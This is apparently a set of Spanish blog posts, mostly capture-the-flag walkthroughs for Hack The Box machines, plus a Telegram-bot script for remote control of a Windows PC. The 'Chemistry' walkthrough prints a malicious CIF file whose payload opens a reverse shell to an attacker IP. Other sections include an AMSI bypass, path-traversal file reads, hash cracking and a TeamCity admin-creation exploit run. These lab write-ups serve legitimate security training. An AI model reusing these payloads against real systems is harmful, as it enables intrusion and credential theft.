    ┌──(root㉿kali)-[/home/user]
    └─# evil-winrm -i 192.168.56.102 -u nica -p hardcore

    *Evil-WinRM* PS C:\Users\nica\Documents> upload /home/user/Invoke-RunasCs.ps1

    Info: Uploading /home/user/Invoke-RunasCs.ps1 to C:\Users\nica\Documents\Invoke-RunasCs.ps1

    Data: 117712 bytes of 117712 bytes copied

    Info: Upload successful!
    
    *Evil-WinRM* PS C:\Users\nica\Documents>

Si intentamos importar el modulo de Invoke-RunasCs.ps1 nos lo bloquea el antivirus.

AMSI (Antimalware Scan Interface) es una protección mejorada de Windows que analiza scripts y bloquea los que contienen firmas conocidas de malware.

Para evitar esto, entraremos a esta web y generar un bypass personalizado: AMSI-Bypass-Generator

El bypass que crearás con esta web lo que hace es Desactiva AMSI en memoria

Una vez desactivado el AMSI ya podemos importar los módulos de Invoke-RunasCs.ps1

  *Evil-WinRM* PS C:\Users\nica\Documents> import-module ./Invoke-RunasCs.ps1

Ahora nos conectaremos remotamente

    *Evil-WinRM* PS C:\Users\nica\Documents> invoke-RunasCs akanksha sweetgirl powershell -remote 192.168.56.101:4444

    [+] Running in session 0 with process function CreateProcessWithLogonW()
    [+] Using Station\Desktop: Service-0x0-503d31$\Default
    [+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2788 created in background.
    *Evil-WinRM* PS C:\Users\nica\Documents>

Si bien recordamos, anteriormente nos pusimos en escucha por el 4444 con nc -nlvp, si nos dirigimos a la terminal vemos que tenemos acceso al usuario akanksha y podemos listar los grupos a los cuales pertenece dicho usuario

    nc -nlvp 4444
      listening on [any] 4444 ...
      connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 49775
      Windows PowerShell
      Copyright (C) Microsoft Corporation. Todos los derechos reservados.


      PS C:\Windows\system32> whoami /groups
      whoami /groups

      INFORMACION DE GRUPO
      --------------------

      Nombre de grupo                              Tipo           SID                                            Atributos
      ============================================ ============== ============================================== ========================================================================
      Todos                                        Grupo conocido S-1-1-0                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
      WIN-IURF14RBVGV\Idministritirs               Alias          S-1-5-21-2519875556-2276787807-2868128514-1002 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
      BUILTIN\Usuarios                             Alias          S-1-5-32-545                                   Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
      NT AUTHORITY\INTERACTIVE                     Grupo conocido S-1-5-4                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
      INICIO DE SESION EN LA CONSOLA               Grupo conocido S-1-2-1                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
      NT AUTHORITY\Usuarios autentificados         Grupo conocido S-1-5-11                                       Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
      NT AUTHORITY\Esta compañia                   Grupo conocido S-1-5-15                                       Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
      NT AUTHORITY\Cuenta local                    Grupo conocido S-1-5-113                                      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
      NT AUTHORITY\AutenticaciOn NTLM              Grupo conocido S-1-5-64-10                                    Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
      Etiqueta obligatoria\Nivel obligatorio medio Etiqueta       S-1-16-8192
      PS C:\Windows\system32>

Vemos diferentes grupos pero el que Nos llama más la atención es WIN-IURF14RBVGV\Idministritirs Alias S-1-5-21-2519875556-2276787807-2868128514-1002 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado es el grupo de administradores. Aunque está mal escrito, tiene los mismos permisos que el grupo de administradores de Windows.

Lo cual nos permitiria entrar en la carpeta del Administrador y ver la flag de root

  PS C:\Windows\system32> cd C:\Users\Administrador\
    root.txt

Finalización

Espero que hayan aprendido mucho haciendo esta máquina y les haya servido de ayuda mi explicación para poder entender esta CTF. Muchas gracias por leer el artículo y no olviden seguirme en GitHub, ya que también iré subiendo herramientas de hacking.

Hola a todos, hoy les presentaré la resolución de una máquina de Hack The Box de dificultad fácil. En esta máquina aprenderemos a subir un archivo CIF malicioso para luego acceder al sistema y, a continuación, acceder por SSH con un usuario y llegar a ser root abusando de LFI.

Reconocimiento

• Enumeración con nmap

  Hacemos un nmap simple para ver los puertos que corren en la máquina

    # Nmap nmap -p- -sS --min-rate 5000 -T5 -Pn -vvv -oN ports.txt 10.10.11.38
    Increasing send delay for 10.10.11.38 from 0 to 5 due to 1525 out of 3812 dropped probes since last increase.
    Warning: 10.10.11.38 giving up on port because retransmission cap hit (2).
    Nmap scan report for 10.10.11.38
    Host is up, received user-set (0.31s latency).
    Scanned at 2024-11-24 13:59:18 CET for 34s
    Not shown: 65124 closed tcp ports (reset), 409 filtered tcp ports (no-response)
    PORT     STATE SERVICE REASON
    22/tcp   open  ssh     syn-ack ttl 63
    5000/tcp open  upnp    syn-ack ttl 63
  
    Read data files from: /usr/bin/../share/nmap
  

  Una vez tenemos los puertos que en este caso como podemos ver es el 22(ssh) y el 5000(upnp)

  aplicamos un nmap más exhaustivo a dichos puertos

    # Nmap nmap -p22,5000 -sC -v -T5 -oN porttinfo.txt 10.10.11.38
    Nmap scan report for 10.10.11.38
    Host is up (0.36s latency).
  
    PORT     STATE SERVICE
    22/tcp   open  ssh
    | ssh-hostkey: 
    |   3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
    |   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
    |_  256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
    5000/tcp open  upnp
  
    Read data files from: /usr/bin/../share/nmap
  

  Ahora accederemos a la web para poder determinar que clase de vulnerabilidades que podemos encontrar

  Si escribimos en el navegador http://10.10.11.38:5000/ nos encontraremos con esta sección.
  

  Vamos a probar a registrarnos para ver qué encontramos.

  

  Una vez registrados, vemos que podemos subir archivos, pero si le damos a here, se nos descargará un archivo .cif

  

  Investigando un poco descubrimos que podemos subir un archivo CIF malicioso

  Explotación del CIF MALICIOS

  Nos copiaremos el código.

        data_Example
        _cell_length_a    10.00000
        _cell_length_b    10.00000
        _cell_length_c    10.00000
        _cell_angle_alpha 90.00000
        _cell_angle_beta  90.00000
        _cell_angle_gamma 90.00000
        _symmetry_space_group_name_H-M 'P 1'
        loop_
        _atom_site_label
        _atom_site_fract_x
        _atom_site_fract_y
        _atom_site_fract_z
        _atom_site_occupancy
          
        H 0.00000 0.00000 0.00000 1
        O 0.50000 0.50000 0.50000 1
        _space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.10.10/4444 0>&1\'");0,0,0'
  
        _space_group_magn.number_BNS  62.448
        _space_group_magn.name_BNS  "P  n'  m  a'  "
  
  

  Lo que hace este código es aplicar una reverse shell abriendo una conexión TCP a la IP que hayamos puesto en el puerto 4444 para obtener acceso a la máquina víctima.

  Una vez entendido lo que hace el código, nos ponemos en escucha.

    nc -nlvp 4444
    listening on [any] 4444 ...
  

  Acceso a la máquina

  Ya hemos obtenido acceso y podemos observar que somos el usuario app

    nc -nlvp 4444                                          
    listening on [any] 4444 ...
    connect to [10.10.16.17] from (UNKNOWN) [10.10.11.38] 38484
    sh: 0: can't access tty; job control turned off
    $ whoami
    app
    $ script /dev/null -c bash
    Script started, file is /dev/null
    app@chemistry:~$ 
  

  Investigando un poco, encontramos esta ruta bastante interesante: /home/app/instance,

  la cual tiene un archivo database.db. Si lo miramos, encontramos diferentes hashes de varios usuarios que podemos intentar romper con John.

  
    john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt  
  
    Using default input encoding: UTF-8
    Loaded 3 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
    Warning: no OpenMP support for this hash type, consider --fork=4
    Press 'q' or Ctrl-C to abort, almost any other key for status
    ********** (?)     
    1g 0:00:00:00 DONE (2024-11-24 17:38) 1.162g/s 16678Kp/s 16678Kc/s 36823KC/s  fuckyooh21..*7¡Vamos!
    Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
    Session completed. 
  
  

  Una vez que tenemos la contraseña del usuario Rosa, podemos intentar acceder por SSH.

      ssh rosa@10.10.11.38
      rosa@10.10.11.38's password: 
      Permission denied, please try again.
      rosa@10.10.11.38's password: 
      Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-196-generic x86_64)
  
      * Documentation:  https://help.ubuntu.com
      * Management:     https://landscape.canonical.com
      * Support:        https://ubuntu.com/pro
  
      System information as of Sun 24 Nov 2024 10:14:54 PM UTC
  
        System load:           0.0
        Usage of /:            73.9% of 5.08GB
        Memory usage:          33%
        Swap usage:            0%
        Processes:             222
        Users logged in:       0
        IPv4 address for eth0: 10.10.11.38
        IPv6 address for eth0: dead:beef::250:56ff:feb9:2fc5
  
  
      Expanded Security Maintenance for Applications is not enabled.
  
      0 updates can be applied immediately.
  
      9 additional security updates can be applied with ESM Apps.
      Learn more about enabling ESM Apps service at https://ubuntu.com/esm
  
  
      The list of available updates is more than a week old.
      To check for new updates run: sudo apt update
      Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
  
      rosa@chemistry:~$ 
  
  

  Y si aplicamos un ls vemos el user.txt(la flag)

      rosa@chemistry:~$ pwd
      /home/rosa
      rosa@chemistry:~$ ls
      root  user.txt
      rosa@chemistry:~$ 
  

  Escalada a root

  Investigando, podemos encontrar que hay puertos internos abiertos pero el que más nos llama la antención es el 127.0.0.1:8080

      netstat  -nltp
      (Not all processes could be identified, non-owned process info
      will not be shown, you would have to be root to see it all.)
      Active Internet connections (only servers)
      Proto Recv-Q Send-Q Local Address           Foreign Address         State  >
      tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN >
      tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN >
      tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN >
      tcp        0      0 0.0.0.0:5000            0.0.0.0:*               LISTEN >
      tcp6       0      0 :::22                   :::*                    LISTEN >
      rosa@chemistry:/home/app$ 
  

  Podemos intentar hacer port forwarding para acceder a dicho puerto.

        ssh -L 4445:127.0.0.1:8080 rosa@10.10.11.38 -fN
  

  este comando establece un túnel SSH que permite acceder a un servicio que se ejecuta en el puerto 8080 del servidor remoto a través del puerto 4445 de tu máquina local, ejecutándose en segundo plano sin abrir una sesión interactiva en el servidor remoto.
  
  

  Una vez hecho esto, podremos acceder a la web http://127.0.0.1:4445.

  

  Pero, investigando un poco, no vemos nada interesante, así que podemos probar a usar curl en el usuario rosa para ver si encontramos algo que nos pueda servir.

    curl http://localhost:8080 --head
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Content-Length: 5971
    Date: Sun, 24 Nov 2024 18:39:59 GMT
    Server: Python/3.9 aiohttp/3.9.1
  

  Vemos que la versión del servidor es aiohttp/3.9.1.

  Investigando un poco en internet, encontramos que es vulnerable a LFI. Si aplicamos el comando en el usuario Rosa, podemos observar la vulnerabilidad.

    curl -s --ruta- as-is http://localhost:8080/assets/../../../../etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
    syslog:x:104:110::/home/syslog:/usr/sbin/nologin
    _apt:x:105:65534::/nonexistent:/usr/sbin/nologin
    tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
    uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
    tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
    landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
    pollinate:x:110:1::/var/cache/pollinate:/bin/false
    fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
    usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
    sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
    systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
    rosa:x:1000:1000:rosa:/home/rosa:/bin/bash
    lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
    app:x:1001:1001:,,,:/home/app:/bin/bash
    _laurel:x:997:997::/var/log/laurel:/bin/false
  
  

  Si podemos visualizar el etc/passwd tambine podriamos visualizar la flag del root

    curl -s --ruta- as-is http://localhost:8080/assets/../../../../root/root.txt
  

  Finalización

  Espero que hayan aprendido mucho haciendo esta máquina y les haya servido de ayuda mi explicación para poder entender esta CTF. Muchas gracias por leer el artículo y no olviden seguirme en GitHub, ya que también iré subiendo herramientas de hacking.

Hola a todos, hoy les presentaré un pequeño script en Python que desarrollé hace unos días, llamado Command and Control. Su función principal es permitir la ejecución remota de diferentes funciones del sistema Windows a través de un bot de Telegram

Requisitos

• Necesitaremos tener BotFeather, Get My ID

  • BotFeather: Utilizaremos BotFeather para crear y tener el token del bot

  • Get MY ID: Será necesario para saber cuál es nuestro ID y poder configurar el bot de forma correcta.

  • Para poder encontrarlo es necesario entrar a Telegram y buscar por BotFeather Get MY ID en el buscador

    

Desarrollo del Script

1. Configuración del Command and Control :

Descripción: Esta sección del script contiene todo el código necesario para configurar y establecer el sistema de Command and Control

Primero, vamos a importar las librerías necesarias para que el script funcione correctamente.

    import telegram 
    from telegram.ext import Application, CommandHandler 
    import os 
    from functools import wraps 
    import pyautogui 

• import telegram: Para la comunicación con la API de Telegram

• from telegram.ext import Application, CommandHandler: Para la comunicación directa al bot de

  telegram tanto respuesta como comandos directos que se le enviaran

• import os: Para que el programa pueda comunicarse directamente al sistema operativo

• from functools import wraps: Para guardar metadatos de funciones al crear los decoradores

• import pyautogui: Para la comunicación con la interfaz gráfica

2- Configuración del Token ,ID del bot :

En esta sección escribiremos tanto nuestro TOKEN como nuestro ID de Telegram.

    TOKEN = 'TOKEN_BOT'
    AUTHORIZED_USERS = [tu_id]  

• TOKEN: Se obtiene la configuración telegram_config para autenticar el bot en la API de Telegram.

• CHAT_ID: Se obtiene la configuración telegram_config para especificar el chat al que se enviará la imagen.
  

3- Validador de ID telegram:

En esta parte del script se creará el decorador, el cual sirve para modificar o extender el funcionamiento de una función o clase sin modificar directamente el código. Lo que hará este decorador será validar si quien intenta entrar en tu ChatBot está autorizado o no, para mayor seguridad

    def authorized_only(func):
        @wraps(func)
        async def wrapped(update, context, *args, **kwargs):
            user_id = update.effective_user.id  
            if user_id not in AUTHORIZED_USERS: 
                await update.message.reply_text('❌No tienes permiso para usar este comando❌')
                return  
            return await func(update, context, *args, **kwargs)  
        return wrapped 

4- Funciones de Control del Sistema Operativo :

En esta sección están los comandos que ejecutará el sistema a través de las órdenes que reciba del bot.

    @authorized_only
    async def lock_screen(update, context):
        os.system('rundll32.exe user32.dll,LockWorkStation')
        await update.message.reply_text('Pantalla bloqueada.')

    @authorized_only
    async def shutdown(update, context):
        await update.message.reply_text('Apagando el PC...')
        os.system('shutdown /s /t 0')

    @authorized_only
    async def reboot(update, context):
        await update.message.reply_text('Reiniciando el PC...')
        os.system('shutdown /r /t 0')

Básicamente, estas son 3 funciones asíncronas: la primera bloquea la pantalla del ordenador, la segunda apaga el sistema Windows y la tercera reinicia el sistema. Para poder usar estas funciones, se aplica el decorador (@authorized_only) para no repetir código y hacerlo más eficiente.

5- Función de Información del Bot:

Esta sección del código hace que el bot creado anteriormente te mande los comandos de cómo usar sus funciones predeterminadas.

    @authorized_only
    async def info(update, context):
        await update.message.reply_text("""
        📡 Command & Control 📡
                                        
        🖥️ Suspender pantalla: /lock
        📴 Apagar PC: /shutdown
        🔄 Reiniciar PC: /reboot
        ⏭️ info: /start

        Usa estos comandos para 
        controlar tu PC de manera remota.
        """)

Esta parte del código simplemente hace que, cuando tú inicias el bot /info, automáticamente te enviará las funciones preprogramadas que tiene para poder empezar a utilizarlo

6- Función de Información del Bot:

Esta es la última parte del código, la cual permite la interacción con el bot a través de comandos, asegurando un buen funcionamiento.

      def main():
          application = Application.builder().token(TOKEN).build()

          application.add_handler(CommandHandler('lock', lock_screen))
          application.add_handler(CommandHandler('shutdown', shutdown))
          application.add_handler(CommandHandler('reboot', reboot))    
          application.add_handler(CommandHandler('start', info)) 
          

          application.run_polling()

      if __name__ == '__main__':
          main()

Se crea la función main, la cual en el primer paso establece la conexión necesaria con la API de Telegram utilizando el token. Las demás opciones son los comandos que tendrás que usar para que responda el bot. Por ejemplo, para reiniciar el PC tendrás que escribir en el chatbot /reboot, y el bot cogerá la función reboot y reiniciará el PC.

En el caso de que no hayas sabido hacer el script, te dejo el link a mi GitHub, para que puedas descargarlo y utilizar el programa sin problemas.

Hasta aquí llega nuestro artículo explicativo sobre cómo crear Command&control.

Espero que les haya servido la explicación y que haya sido clara. No olviden seguirme en GitHub, ya que iré subiendo nuevos repositorios.

Hola a todos, hoy les presentaré la resolución de una máquina Hack the box de dificultad Media. En esta máquina aprenderemos a explotar una vulnerabilidad en TeamCity 2023.05.3 para posteriormente conectarnos por SSH y llegar a ser root aprovechando una versión obsoleta de runC (versión 1.1.7).

Reconocimiento

• Enumeración con nmap Hacemos un nmap simple para ver los puertos que corren en la máquina

    # nmap -p- -sS --min-rate 5000 -T5 -Pn -vvv -oN nmap.txt 10.10.11.13
    Increasing send delay for 10.10.11.13 from 0 to 5 due to 1097 out of 2741 dropped probes since last increase.
    Warning: 10.10.11.13 giving up on port because retransmission cap hit (2).
    Nmap scan report for 10.10.11.13
    Host is up, received user-set (0.34s latency).
    Scanned at 2024-08-13 22:25:19 CEST for 38s
    Not shown: 65532 closed tcp ports (reset)
    PORT     STATE SERVICE  REASON
    22/tcp   open  ssh      syn-ack ttl 63
    80/tcp   open  http     syn-ack ttl 63
    8000/tcp open  http-alt syn-ack ttl 63
      
    Read data files from: /usr/bin/../share/nmap
  

  Una vez tenemos los puertos que en este caso como podemos ver es el 22(ssh) , el 80(http) y el 8000(HTTP Alternative).

  Aplicamos un nmap más exhaustivo a dichos puertos

    # nmap -p22,80,8000 -sVC -v -oN port.txt 10.10.11.13
    Nmap scan report for 10.10.11.13
    Host is up (0.54s latency).
      
    PORT     STATE SERVICE     VERSION
    22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
    |_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
    80/tcp   open  http        nginx 1.18.0 (Ubuntu)
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: Did not follow redirect to http://runner.htb/
    |_http-server-header: nginx/1.18.0 (Ubuntu)
    8000/tcp open  nagios-nsca Nagios NSCA
    |_http-title: Site doesn't have a title (text/plain; charset=utf-8).
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
      
    Read data files from: /usr/bin/../share/nmap
  

  Podemos ver que se aplica un follow redirecta http://runner.htb/ así que lo añadiremos al /etc/hosts

    10.10.11.13 runner.htb
  

  Ahora accedemos a la web para poder determinar que clase de vulnerabilidades podemos encontrar

  Accedemos a la web por el puerto 80 encontramos esto, si miramos en Home, About, Service no hay nada interesante

  

  Si intentamos mirar por 'subdominios o rutas’ no encontramos anda así que aplicaremos este comando de aquí.

  Lo que hará este comando será crear una lista de palabras personalizada a partir del contenido de una página web

    cewl http://runner.htb/ | grep -v CeWL > words_runner.tx
  

  Una vez creada la wordlist de palabras, podemos intentar escanear subdominios con esta lista y encontramos TeamCity.runner.htb

    gobuster vhost -w words_runner.txt -u http://runner.htb -H "hosts: FUZZ.runnter.htb" --append-domain
    ===============================================================
    Gobuster v3.6
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:             http://runner.htb
    [+] Method:          GET
    [+] Threads:         10
    [+] Wordlist:        words_runner.txt
    [+] User Agent:      gobuster/3.6
    [+] Timeout:         10s
    [+] Append Domain:   true
    ===============================================================
    Starting gobuster in VHOST enumeration mode
    ===============================================================
    Found: TeamCity.runner.htb Status: 401 [Size: 66]
    Progress: 285 / 286 (99.65%)
    ===============================================================
    Finished
    ===============================================================
  

  Añadiremos TeamCity.runner.htb a nuestro /etc/hosts

    10.10.11.13 runner.htb TeamCity.runner.htb
  

  Si ahora vamos al navegador y ponemos el subdominio encontrado anteriormente ,encontraremos este login , pero nos llama la atención la versión de TeamCity v2023.05.3

  

  Si buscamos en searchsploit encontramos que es vulnerable

     searchsploit TeamCity 2023.05.3
    ------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
     Exploit Title                                                                                                                      |  Path
    ------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
    JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)                                                                          | java/remote/51884.py
    ------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
  

  Así que nos descargaremos el exploit

    searchsploit TeamCity 2023.05.3 -m java/remote/51884.py
  

  Explotación de TeamCity 2023.05.3

  Ejecutamos el exploit y nos da un usuario y password

    python3 51884.py -u http://teamcity.runner.htb
      
    =====================================================
    *       CVE-2023-42793                              *
    *  TeamCity Admin Account Creation                  *
    *                                                   *
    *  Author: ByteHunter                               *
    =====================================================
      
    Token: eyJ0eXAiOiAiVENWMiJ9.T3RudmdKTVdZT29nZkp4MndSdlBwanZfVmRF.N2VhMDk0ZjktMGM2MS00OWE1LTkyZGQtZDllMmJhMjFiNTU1
    Successfully exploited!
    URL: http://teamcity.runner.htb
    Username: city_admind2GF
    Password: Main_password!!**
  

  Una vez tenemos la contraseña y usuario podemos iniciar sesión, una vez iniciemos sesión seremos admin así que tenemos la capacidad de descargar backup

  

  Nos dirigiremos administración y le daremos a la sección de backup. Una vez hecho esto le daremos al botón Start Backup y nos saldrá un .zip que nos podemos descargar

  

  Una vez descargado , unzipearemos el .zip para poder ver que encontramos en ese backup.

  Dentro del backup encontramos estos

    charset  config  database_dump  export.report  metadata  system  version.txt
  

  Al explorar el contenido de las carpetas, encontramos una ruta que almacena un archivo id_rsa, el cual podríamos intentar utilizar para conectarnos por SSH.

    config/projects/AllProjects/pluginData/ssh_keys
  

  Pero aún nos queda saber con qué usuario nos conectaremos. Nos dirigimos a la carpeta database_dump y encontramos un archivo llamado users, el cual llama bastante nuestra atención. Si usamos cat para ver su contenido, observamos hashes que podríamos intentar descifrar con John

    ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
    1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, john@runner.htb, 1723754735147, BCRYPT
    2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
    11, admin.03tq, $2a$07$ssCrJlQub3j6JilRvlqtbOVQuzhwxRPcuWNOylHgTr1q7APg727RK, , admin.03tQ@lol.omg, 1723753919282, BCRYPT
    12, city_adminvb7m, $2a$07$MjRIMfFQyaBzNAy8BVbS..snX3Zz0npHUZP7wdonGIdN9oxtkqYyS, , angry-admin@funnybunny.org, 1723754746653, BCRYPT
  

  Hemos encontrado la contraseña piper123, la cual nos será útil más adelante

    john --wordlist=wordlist hash
    Using default input encoding: UTF-8
    Loaded 4 password hashes with 4 different salts (bcrypt [Blowfish 32/64 X3])
    Cost 1 (iteration count) is 128 for all loaded hashes
    Will run 2 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    Warning: Only 1 candidate left, minimum 6 needed for performance.
    piper123         (?)
    1g 0:00:06:56 DONE (2024-08-15 23:43) 20.00g/s 20.00p/s 80.00c/s 80.00C/s piper123
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed.
  

  Acceso a la máquina con ssh

  Ahora nos conectaremos por ssh primero de todo le damos permisos chmod 600 id_rsa y luego ssh -i john@10.10.11.13 -i id_rsa

    ssh john@10.10.11.13 -i id_rsa
    Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-102-generic x86_64)
      
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/pro
  

  Y si hacemos un lsencontraremos el user.txt(flag)

    john@runner:~$ ls
    user.txt
  

  Escalada a root

  Si miramos los puertos que corren en la máquina víctima con el comando netstat -ntlp, encontramos varios puertos que nos llaman la atención

    john@runner:~$ netstat -nltp
    Active Internet connections (only servers)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
    tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -
    tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
    tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
    tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -
    tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
    tcp6       0      0 :::80                   :::*                    LISTEN      -
    tcp6       0      0 :::22                   :::*                    LISTEN      -
    tcp6       0      0 :::8000                 :::*                    LISTEN      -
  

  Vamos a aplicar port forwarding a dichos puertos para que nuestra máquina local pueda acceder a los servicios que corren en los puertos de la máquina víctima

    ssh -L 9443:127.0.0.1:9443 -L 8111:127.0.0.1:8111 -L 9000:127.0.0.1:9000 -L 5005:127.0.0.1:5005 juan@10.10.11.13 -i id_rsa
  

  Si miramos de acceder a 127.0.0.1:9000 encontramos este panel de inicio de sesión

  

  Vamos a probar a acceder con el usuario Matthewy la contraseña descifrada anteriormente, piper123.

  Como podemos ver en la imagen, se utilizando Portainer para gestionar contenedores.

  

  Portainer es una herramienta gráfica para gestionar Docker, pero el software que realmente ejecuta los contenedores en el sistema podría ser runC.

  Para confirmar si runC está en uso podemos aplicar esto en la máquina victima

    runc --version
  

  Y efectivamente , tiene runc v1.1.7

    john@runner:~$ runc --version
    runc version 1.1.7-0ubuntu1~22.04.1
    spec: 1.0.2-dev
    go: go1.18.1
    libseccomp: 2.5.3
  

  Si buscamos en Google por runc version 1.1.7 vulnerability encontramos esta web

  Vamos a explotar está vulnerabilidad

  Primero de todo crearemos un contenedor

  

  

  Una vez hecho esto , se nos creará el contenedor , vamos a acceder y entraremos a la sección de console

  

  Y nos conectaremos como root

  

  Nos saldrá una terminal y somos root

  

  Finalización

  Espero que hayan aprendido mucho haciendo esta máquina y les haya servido de ayuda mi explicación para poder entender esta CTF. Muchas gracias por leer el artículo y no olviden seguirme en GitHub, ya que también iré subiendo herramientas de hacking.